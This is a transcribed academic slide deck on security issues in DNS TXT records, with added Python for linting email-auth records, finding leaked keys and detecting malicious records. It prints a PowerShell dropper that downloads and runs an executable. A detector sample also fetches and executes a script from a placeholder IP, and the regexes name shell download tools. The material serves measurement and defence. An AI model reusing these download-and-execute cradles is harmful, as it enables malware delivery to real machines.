TXTing 101: Finding Security Issues in the Long Tail of DNS TXT - - PowerPoint PPT Presentation



SLIDE 1

TXTing 101: Finding Security Issues in the Long Tail of DNS TXT Records

  • O. van der Toorn (1)
  • R. van Rijswijk-Deij (1)
  • T. Fiebig (2)
  • M. Lindorfer (3)
  • A. Sperotto (1)

2020-08-21

(1) University of Twente, (2) TU Delft, (3) TU Wien

SLIDE 2

DNS TXT Records

SLIDE 3

DNS TXT Records

dig -t TXT 1.adventure.splode.com

Contact details: tide-project.nl, .i.vandertoorn@utwente.nl
SLIDE 4

Outline

  • Background
  • Evolution of TXT records
  • Undefined Purpose
  • Mistakes with a Security Implication
  • Malicious Use Cases
  • Takeaways

SLIDE 5

Background

SLIDE 6

Background: DNS TXT records

  • TXT records are free-form text, so they offer a low-friction way to attach new functionality to a name without defining a new record type.
  • RFC 1464 tries to add structure by defining a key-value ("attribute=value") store.
  • RFC 5507 discourages overloading TXT for new protocol extensions.
  • The common uses of TXT records are SPF, DKIM and DMARC.

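As an added example (not code from these slides or from the OpenINTEL project), the following Python parses the three well-defined TXT families named above, SPF, DKIM and DMARC, from dig's presentation format and flags the settings in them that have a security implication. It also shows why a consumer has to concatenate TXT <character-string>s: dig prints one record as several quoted strings whenever it exceeds 255 bytes, which is the normal case for DKIM keys. The record set is constructed here, and the owner names and issue messages are assumptions of the example.

```python
import re


def join_character_strings(rdata):
    """TXT rdata is a list of <character-string>s of at most 255 bytes each. dig prints
    them as "..." "..." and a consumer must concatenate them: a DKIM key longer than
    255 bytes is always split this way, and so are many long SPF policies."""
    parts = re.findall(r'"((?:[^"\\]|\\.)*)"', rdata)
    return "".join(p.replace('\\"', '"') for p in parts) if parts else rdata


def parse_tag_value(text):
    """DKIM and DMARC records are 'tag=value; tag=value' lists (RFC 6376, RFC 7489)."""
    tags = {}
    for field in text.split(";"):
        if "=" in field:
            key, value = field.split("=", 1)
            tags[key.strip()] = value.strip()
    return tags


def parse_spf(text):
    """[(qualifier, term)] for an SPF policy; the default qualifier is '+' (pass)."""
    parsed = []
    for term in text.split()[1:]:               # element 0 is the v=spf1 version tag
        qualifier = term[0] if term[0] in "+-~?" else "+"
        parsed.append((qualifier, term.lstrip("+-~?")))
    return parsed


def parse_txt(owner, rdata):
    """Classify one TXT record by content and owner name."""
    text = join_character_strings(rdata).strip()
    if text.lower().startswith("v=spf1"):
        return {"type": "spf", "terms": parse_spf(text)}
    tags = parse_tag_value(text)
    if owner.startswith("_dmarc.") and tags.get("v") == "DMARC1":
        return {"type": "dmarc", "tags": tags}
    if "._domainkey." in owner and "p" in tags:  # v=DKIM1 is optional in RFC 6376
        return {"type": "dkim", "tags": tags}
    return {"type": "other", "text": text}


# SPF terms that cost a DNS lookup; RFC 7208 allows at most 10 per evaluation.
SPF_LOOKUP_TERMS = {"a", "mx", "ptr", "exists", "include", "redirect"}


def lint(parsed):
    """Settings with a security implication in an already parsed record."""
    issues = []
    if parsed["type"] == "spf":
        qualifiers = {term: q for q, term in parsed["terms"]}
        if qualifiers.get("all") == "+":
            issues.append("SPF +all: every sender passes")
        if "all" not in qualifiers and not any(t.startswith("redirect=") for t in qualifiers):
            issues.append("SPF has no 'all' term: result defaults to neutral")
        lookups = sum(re.split(r"[:=/]", t)[0].lower() in SPF_LOOKUP_TERMS for t in qualifiers)
        if lookups > 10:
            issues.append(f"SPF needs {lookups} DNS lookups: over the limit of 10, permerror")
    elif parsed["type"] == "dkim" and parsed["tags"]["p"] == "":
        issues.append("DKIM key revoked: empty p= tag")
    elif parsed["type"] == "dmarc" and parsed["tags"].get("p") == "none":
        issues.append("DMARC p=none: monitoring only, failures are not rejected")
    return issues


# Constructed sample RRset in dig's presentation format (not from the paper's dataset).
SAMPLE_RECORDS = [
    ("example.org.", '"v=spf1 ip4:192.0.2.0/24 include:_spf.example.net " "-all"'),
    ("weak.example.org.", '"v=spf1 +all"'),
    ("_dmarc.example.org.", '"v=DMARC1; p=none; rua=mailto:dmarc@example.org"'),
    ("sel1._domainkey.example.org.", '"v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4" "GNADCBiQKBgQC"'),
    ("old._domainkey.example.org.", '"v=DKIM1; p="'),
]


def check_records(records):
    """[(owner, type, issues)] for (owner, rdata) pairs."""
    out = []
    for owner, rdata in records:
        parsed = parse_txt(owner, rdata)
        out.append((owner, parsed["type"], lint(parsed)))
    return out


if __name__ == "__main__":
    for owner, kind, issues in check_records(SAMPLE_RECORDS):
        print(f"{owner:32} {kind:6} {'; '.join(issues) or 'ok'}")
```

The DKIM sample is deliberately split across two quoted strings in the middle of the base64 key; without `join_character_strings` the `p=` value would be truncated and the key would fail to load, which is the most common way a "correct" DKIM record is mis-read by home-grown tooling.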

SLIDE 10

Dataset: OpenINTEL

OpenINTEL is an active DNS measurement platform.

  • 236 million domains measured on a daily basis.
  • TXT records between 2015 and 2018 (1.2 × 10^11 records).

SLIDE 13

Evolution of TXT records

SLIDE 14

Growth

[Figure: growth (%) of the number of domains and of TXT records, 2015-07 to 2018-07; y-axis 100% to 200%]

SLIDE 16

TXT Records

[Figure: number of TXT records (up to 80 M), 2015-07 to 2018-07, by category: Email, Encoded, Miscellaneous, Other Patterns, Verification]

SLIDE 17

Other TXT Records

[Figure: number of "Other" TXT records (up to 1 M), 2015-07 to 2018-07, by subcategory: Malicious, Mistakes, Unclassified, Undefined Purpose]

SLIDE 18

Undefined Purpose

SLIDE 19

Undefined Purpose

Type of records in this category:

  • Base64-encoded MX records
  • Empty, or executable references
  • Single-character TXT records

SLIDE 22

Single Character Records

wtmc@localhost:~$ dig -t TXT single_char.example.org
single_char.example.org. 3600 IN TXT "@"

SLIDE 23

Single Character Records

[Figure: number of single-character records (log scale, 1 to 1 M), 2015-07 to 2018-07, for the values "~", "0" and "@"]

SLIDE 24

Origin Tilde Character Records

[Figure: origin of the "~" records (log scale, 1 to 1 M), 2015-10 to 2018-09; legend entries 40034, 19905 and 13335]

SLIDE 25

Single Character Records

  • Might be used to identify domains
  • Do not have a security impact

SLIDE 27

Mistakes with a Security Implication

SLIDE 28

Mistakes with a Security Implication

Type of records in this category:

  • Certificates
  • Public and Private Keys

SLIDE 30

Public and Private Keys

wtmc@localhost:~$ dig -t TXT key.example.org
key.example.org. 3600 IN TXT "-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqGKukO1De7zhZj6+H0qtjTkVxwTCpvKe4eCZ0FPqri0cb2JZfXJ/DgYSF6vUpwmJG8wVQZKjeGcjDOL5UlsuusFncCzWBQ7RKNUSesmQRMSGkVb1/3j+skZ6UtW+5u09lHNsj6tQ51s1SPrCBkedbNf0Tp0GbMJDyR4e9T04ZZwIDAQAB -----END PUBLIC KEY-----"

SLIDE 31

Public and Private Keys

[Figure: number of records exposing keys (total, private, public), 2015-07 to 2018-07; y-axis 20 to 120]

SLIDE 32

Public and Private Keys

At 2018-12-31 there were 89 domains exposing keys:

  • 54 exposed a single key; 55.6% of those keys were private keys
  • 35 exposed two keys; 94.3% of those were a matching public/private key pair

SLIDE 37

Public and Private Keys

  • A published private key may invalidate the security measure it belongs to, e.g. DKIM: if the leaked key is a DKIM signing key, anyone who reads the record can produce valid DKIM signatures for the domain.
  • Shows a misunderstanding of the security technology

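The slides state the failure; the following Python, added here and not part of the slides or the TIDE project, is the check an auditor would run over a zone's TXT records to find it: locate PEM blocks, parse the DER just far enough to recover each RSA modulus, and report a private key whose modulus matches a public key or a DKIM selector's p= under the same domain, which is exactly the case in which DKIM is invalidated. The public key is the one shown on slide 30; the private key is a constructed PKCS#1 structure that reuses that modulus with dummy private components, so it exercises the matching logic without being a usable key. Owner names, the registrable-domain heuristic and the 2048-bit threshold are assumptions, and the DER reader covers only what RSA keys need rather than being a general parser.

```python
import base64
import re

PEM_RE = re.compile(r"-----BEGIN ([A-Z ]+)-----(.*?)-----END \1-----", re.S)


def der_read(buf, pos=0):
    """Read one DER TLV at pos; return (tag, content, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long form: low 7 bits = number of length octets
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def der_children(content):
    """(tag, content) of every TLV packed inside a SEQUENCE body."""
    pos, out = 0, []
    while pos < len(content):
        tag, body, pos = der_read(content, pos)
        out.append((tag, body))
    return out


def rsa_public(der):
    """SubjectPublicKeyInfo ::= SEQ { AlgorithmIdentifier, BIT STRING { RSAPublicKey } }."""
    bitstring = der_children(der_read(der)[1])[1][1]
    rsapub = der_read(bitstring[1:])[1]    # first octet of a BIT STRING counts unused bits
    n, e = [int.from_bytes(b, "big") for t, b in der_children(rsapub) if t == 0x02][:2]
    return n, e


def rsa_private(der, label):
    """PKCS#1 'RSA PRIVATE KEY' ::= SEQ { version, n, e, d, ... }; PKCS#8 'PRIVATE KEY'
    wraps that structure in an OCTET STRING. Returns (n, e)."""
    body = der_read(der)[1]
    if label == "PRIVATE KEY":
        body = der_read(der_children(body)[2][1])[1]
    ints = [int.from_bytes(b, "big") for t, b in der_children(body) if t == 0x02]
    return ints[1], ints[2]                # ints[0] is the version


def keys_in_txt(rdata):
    """[(kind, n, e)] for every PEM block in one TXT record. dig prints a long record as
    several quoted strings, and the base64 may carry whitespace from line wrapping."""
    text = "".join(re.findall(r'"([^"]*)"', rdata)) or rdata
    found = []
    for label, b64 in PEM_RE.findall(text):
        der = base64.b64decode(re.sub(r"\s+", "", b64))
        if label == "PUBLIC KEY":
            found.append(("public",) + rsa_public(der))
        elif label in ("RSA PRIVATE KEY", "PRIVATE KEY"):
            found.append(("private",) + rsa_private(der, label))
    return found


def dkim_modulus(rdata):
    """Modulus from a DKIM record's p= tag, which carries base64 SubjectPublicKeyInfo."""
    match = re.search(r"\bp=([A-Za-z0-9+/=]+)", re.sub(r'["\s]', "", rdata))
    return rsa_public(base64.b64decode(match.group(1)))[0] if match else None


def audit_keys(zone):
    """zone: [(owner, rdata)]. Keys are grouped per registrable domain (last two labels)."""
    dkim, exposed, findings = {}, {}, []
    for owner, rdata in zone:
        if "._domainkey." in owner:
            n = dkim_modulus(rdata)
            if n:
                dkim[n] = owner
        for kind, n, e in keys_in_txt(rdata):
            exposed.setdefault(".".join(owner.rstrip(".").split(".")[-2:]), []).append((owner, kind, n))
    for domain, keys in exposed.items():
        public = {n for _, kind, n in keys if kind == "public"}
        for owner, kind, n in keys:
            if n.bit_length() < 2048:
                findings.append(f"{owner}: {kind} RSA key is only {n.bit_length()} bits")
            if kind == "private":
                findings.append(f"{owner}: PRIVATE key published in DNS")
                if n in public:
                    findings.append(f"{owner}: private key matches a public key published under {domain}")
                if n in dkim:
                    findings.append(f"{owner}: private key is the DKIM signing key for {dkim[n]}")
    return findings


# Sample data. SPKI_B64 is the public key shown on slide 30. FAKE_PKCS1_B64 is a CONSTRUCTED
# PKCS#1 structure reusing that modulus with dummy private components (not a usable key).
SPKI_B64 = "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqGKukO1De7zhZj6+H0qtjTkVxwTCpvKe4eCZ0FPqri0cb2JZfXJ/DgYSF6vUpwmJG8wVQZKjeGcjDOL5UlsuusFncCzWBQ7RKNUSesmQRMSGkVb1/3j+skZ6UtW+5u09lHNsj6tQ51s1SPrCBkedbNf0Tp0GbMJDyR4e9T04ZZwIDAQAB"
SAMPLE_N, SAMPLE_E = rsa_public(base64.b64decode(SPKI_B64))


def der_encode(tag, content):
    """Minimal DER encoder (short and long length forms), used only to build the sample."""
    length = len(content)
    if length < 128:
        return bytes([tag, length]) + content
    lb = length.to_bytes((length.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content


der_int = lambda v: der_encode(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big"))  # positive INTEGER
FAKE_PKCS1_B64 = base64.b64encode(der_encode(
    0x30, der_int(0) + der_int(SAMPLE_N) + der_int(SAMPLE_E) + der_int(1) * 6)).decode()

SAMPLE_ZONE = [
    ("key.example.org.", '"-----BEGIN PUBLIC KEY----- ' + SPKI_B64[:64] + '" "' + SPKI_B64[64:] + ' -----END PUBLIC KEY-----"'),
    ("sel1._domainkey.example.org.", '"v=DKIM1; k=rsa; p=' + SPKI_B64[:100] + '" "' + SPKI_B64[100:] + '"'),
    ("key.example.org.", '"-----BEGIN RSA PRIVATE KEY----- ' + FAKE_PKCS1_B64 + ' -----END RSA PRIVATE KEY-----"'),
]
```

Matching on the modulus rather than on the PEM text is what makes the DKIM link visible: a DKIM `p=` value is the same SubjectPublicKeyInfo that sits inside a `-----BEGIN PUBLIC KEY-----` block, so a private key whose `n` equals the selector's `n` is the signing key, however the operator formatted the records.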

SLIDE 39

Malicious Use Cases

SLIDE 40

Malicious Use Cases

Type of records in this category:

  • Commands
  • JavaScript
  • PowerShell

SLIDE 43

PowerShell

wtmc@localhost:~$ dig -t TXT powershell.example.org
powershell.example.org. 3600 IN TXT ...

SLIDE 44

PowerShell

The record's content, with dig's \' escaping removed (the download URLs are replaced by <CODE A> to <CODE D> on the slide). It stages a file in %APPDATA%, picks the download URL by whether a .NET Framework v4 directory exists, renames the file to t.exe, starts it, and deletes it after 180 seconds:

$a=(new-object net.webclient);
$b=$Env:APPDATA; $w=$Env:WINDIR;
$c=$b+'//t.txt'; $g=$b+'//t.exe';
$p=$w+'//Microsoft.NET//Framework';
if (gci -Path $p | where {$_.Name -like 'v4*'}) {
  try   { $a.DownloadFile('https://filebin.ca/<CODE A>', $c); ren $c t.exe; start $g }
  catch { $a.DownloadFile('https://files.fm/down.php?i=<CODE B>', $c); ren $c t.exe; start $g }
} else {
  try   { $a.DownloadFile('https://filebin.ca/<CODE C>', $c); ren $c t.exe; start $g }
  catch { $a.DownloadFile('https://files.fm/down.php?i=<CODE D>', $c); ren $c t.exe; start $g }
};
sleep 180; rm $g
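Added example, not the paper's classifier: a Python detector that runs the kind of indicator regexes the tail analysis needs over TXT record text, and that also base64-decodes any record which is nothing but base64 and rescans its UTF-16LE decoding, which is what a PowerShell -EncodedCommand body looks like when it is parked in DNS. The first sample is abridged from the record on slide 44 with the slide's <CODE A> and <CODE B> placeholders kept; the encoded sample, the indicator list, the owner names and the two-indicator threshold are assumptions of the example.

```python
import base64
import re

# (label, regex). Case-insensitive because PowerShell is, and because operators mix case
# precisely to dodge naive string matching. Assumed indicator set, not the paper's.
INDICATORS = [
    ("ps_download_cradle", re.compile(
        r"new-object\s+(system\.)?net\.webclient|downloadfile|downloadstring|invoke-webrequest|\biwr\b", re.I)),
    ("ps_execution", re.compile(r"invoke-expression|\biex\b|\bstart(-process)?\s+\$\w+", re.I)),
    ("ps_encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("env_staging_dir", re.compile(r"\$env:(appdata|temp|tmp|windir|programdata)", re.I)),
    ("shell_command", re.compile(r"(^|[;&|]\s*)(curl|wget|bash|sh|nc|chmod\s+\+x)\b", re.I)),
    ("javascript", re.compile(r"<script\b|document\.write\(|\beval\(|unescape\(|fromcharcode", re.I)),
]


def decoded_views(text):
    """Yield the record text and, when the whole record is base64, its decoding as
    UTF-8 and as UTF-16LE (the encoding PowerShell -EncodedCommand expects)."""
    yield text
    compact = re.sub(r"\s+", "", text)
    if not re.fullmatch(r"[A-Za-z0-9+/]{16,}={0,2}", compact) or len(compact) % 4:
        return
    raw = base64.b64decode(compact)
    for encoding in ("utf-8", "utf-16-le"):
        try:
            decoded = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        # Binary blobs (DER keys, hashes) decode to mostly unprintable text; skip them.
        if sum(c.isprintable() or c.isspace() for c in decoded) / len(decoded) > 0.95:
            yield decoded


def scan_txt(text):
    """Sorted labels of every indicator that fires on any view of the record."""
    hits = set()
    for view in decoded_views(text):
        hits.update(label for label, rx in INDICATORS if rx.search(view))
    return sorted(hits)


def is_payload(text):
    """Two independent indicators, or a download cradle on its own, count as a payload."""
    hits = scan_txt(text)
    return len(hits) >= 2 or "ps_download_cradle" in hits


# Constructed samples. DROPPER is abridged from the record on slide 44 (dig's \' escapes
# removed, the slide's <CODE A>/<CODE B> placeholders kept). ENCODED is built here.
DROPPER = ("$a=(new-object net.webclient); $b=$Env:APPDATA; $c=$b+'//t.txt'; $g=$b+'//t.exe'; "
           "try {$a.DownloadFile('https://filebin.ca/<CODE A>', $c); ren $c t.exe; start $g} "
           "catch {$a.DownloadFile('https://files.fm/down.php?i=<CODE B>', $c); ren $c t.exe; start $g}")
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage2.ps1')".encode("utf-16-le")).decode()

SUSPECT_SAMPLES = [
    ("c2.example.org.", DROPPER),
    ("enc.example.org.", ENCODED),
    ("example.org.", "v=spf1 include:_spf.example.net -all"),
    ("example.org.", "google-site-verification=1Zfh9j9zKQJ3kL0vNQ3cPVxz7Q"),
    ("single.example.org.", "~"),
]


def triage(records):
    """[(owner, indicator labels, is_payload)] for (owner, text) pairs."""
    return [(owner, scan_txt(text), is_payload(text)) for owner, text in records]


if __name__ == "__main__":
    for owner, hits, payload in triage(SUSPECT_SAMPLES):
        print(f"{owner:22} {'PAYLOAD' if payload else 'ok':8} {', '.join(hits)}")
```

The decode step matters more than the regex list: the slide 44 record is plain text and any string match finds it, but the same cradle base64-encoded in UTF-16LE contains none of the indicator substrings, so a scanner that never decodes would file it under "Encoded" next to harmless verification tokens.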

SLIDE 45

Bonus: Zoom verification tokens

[Figure: adoption of Zoom verification tokens, 2019-01 to 2020-07, TXT record count (up to 14 k). Annotations: "regular" growth; WHO publishes news on the virus; many countries start to enforce WFH; 2.19x more records; 500 .top domains adding Zoom tokens]

SLIDE 46

Takeaways

SLIDE 47

Takeaways

  • The majority of DNS TXT use is well defined.
  • We classify 99.54% of the TXT records in our dataset.

SLIDE 50

Takeaways

Analyzing the tail of the TXT records is not only a needle-in-the-haystack problem; it also becomes a human intelligence problem.

Regular expressions used: tide-project.nl/blog/wtmc2020
Project website: tide-project.nl